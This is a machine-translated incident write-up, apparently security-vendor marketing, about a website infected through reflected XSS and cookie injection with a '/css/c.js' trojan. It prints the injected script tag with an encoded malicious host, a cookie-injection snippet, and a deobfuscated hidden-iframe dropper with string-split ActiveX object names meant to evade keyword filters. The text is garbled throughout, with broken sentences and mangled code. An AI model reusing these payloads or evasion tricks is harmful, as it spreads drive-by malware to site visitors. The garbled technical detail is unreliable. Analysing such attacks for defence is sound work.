Latest/CSS/c. js Trojan guard note

One day, Mr. Ren, a website maintainer, opened the homepage of the website as usual and clicked a link to verify whether the website can be accessed normally. He did not expect to trigger an alert for the anti-virus software: "discovering malware ". Even though I was surprised by the fact that almost all the links on the home page were added with a strange website "http://c.nuclear3.com/css/c.js”", this JS script triggers the virus-proof software alarm.
 
In desperation, Mr. Ren thought of Starling, a network security equipment provider of his company, and immediately contacted local staff of the company. At the same time, he also provided website log files.
 
Attackers
 
Soon, Mr. Ren received feedback from Starling engineers on the website/down. there is a reflection-type XSS vulnerability on the asp page. Hackers exploit this vulnerability to inject malicious scripts through cookie injection.
<Script Src = http://c.nu % 63% 6Cear3.com/css/c.js> </script>

Inject to every website link for the purpose of endangering users.
 
· Tips: What is reflective XSS?
 
When a Web client uses a Server script to generate a page to provide data for users, if unauthenticated user data is included in the page without HTML Entity encoding, client code can be injected into dynamic pages.
 
In this example, hackers embed malicious scripts into URLs. Once a visitor clicks this link, the browser will think that the malicious code is from the website, so as to "Safely" the execution.
 
· Tips: cookie Injection
Cookie injection is a form of SQL injection attacks. The system directly uses "request (" name ")" to obtain the data submitted by the customer, and does not filter the variables submitted by the customer, request is not restricted in the anti-injection program. cookie.
 
A typical example is:
Javascript: alert (document. cookie = "id =" + escape (XX and "attack string ")

Cut off and inject black hands
 
After understanding the root cause of the problem, the rest is the defense problem. With the assistance of Starling engineers, through the remote website Security Inspection Service of anxing, Xiao Ren cleared Trojans hanging on the page one by one, and found several SQL injection and XSS vulnerabilities on the website, because the original website security check Code cannot be restored at the semantic level (①), the two types of attacks cannot be completely eliminated. This can only be solved by deploying corresponding security products. After comparing several domestic and foreign Web security defense products, the website finally chose the tianqing intrusion defense product, it uses attack management analysis to precisely block Web threats such as SQL injection and XSS attacks. Compared with traditional Web security built based on data feature matching and exception model, it has lower false negative rate and false positive rate. After tianqing's intrusion protection product was launched, when Mr. Ren attempted to launch another attack with the previous injection vulnerability, he found that the product event monitoring platform had immediately encountered an alarm and blocked it. After using the anxing inspection service again, we found that no vulnerability could be detected.
 
Note ①: Continue to take the/css/c. js Trojan as an example. The injection code of this trojan is http://c.nuclear3.com/css/c.js, but this. js script is not really an attack code, but only a verification code:
Document. write ("<iframe src = http://fvgit.cn/01/index.htm width = 100 height = 0> </iframe> ");

This script file will reference harmful links in a hidden box: hidden:
Var ll = new ActiveXObject ("snpv" + "w. Snap" + "shot View" + "er Cont" + "rol.1 ");}
Rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ". I "+" ERP "+" Ctl.1 ";

This replacement and Avoidance Method requires semantic restoration. If only keywords are checked, such attacks cannot be detected and defended.